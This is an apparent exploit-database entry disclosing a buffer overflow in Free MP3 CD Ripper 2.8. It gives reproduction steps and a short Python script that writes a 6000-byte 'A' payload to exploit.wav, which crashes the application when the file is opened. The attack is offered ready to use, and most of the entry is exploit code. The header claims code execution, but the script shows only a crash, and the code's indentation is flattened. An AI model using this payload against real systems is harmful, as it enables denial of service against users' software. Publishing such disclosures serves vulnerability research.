Share
#Exploit Title : Free MP3 CD Ripper 2.8 Buffer Overflow (DOS)  
#Date: 23-08-2019  
#Vulnerable Software: FREE MP3 CD RIPPER 2.8 Build 20140611  
#Vendor Home Page: www.cleanersoft.com/  
#Software Link: www.cleanersoft.com/cd_ripper/free_cd_ripper.html  
#Tested On: Windows 7 (64Bit)  
#Attack Type : Denial of Service  
#Impact : Code Execution  
#Tested Version - 2.8  
  
#Author - Malav Vyas  
  
#Twitter - @malav_vyas1  
  
#Contact - malavvyas98@gmail.com  
  
"""  
Steps to reproduce  
  
[1] Run this python file and generate exploit.wav file  
[2] Open Free Mp3 CD ripper on target and click on convert button  
[3] select exploit.wav file  
[4] w00t!! Application should crash, resulting in Denial of service  
  
"""  
  
  
#!/usr/bin/python   
  
buffer = "A" * 6000  
  
payload = buffer   
try:  
f=open("exploit.wav","w")  
print "[+] Creating %s bytes evil payload.." %len(payload)  
f.write(payload)  
f.close()  
print "[+] File created!"  
except:  
print "File cannot be created"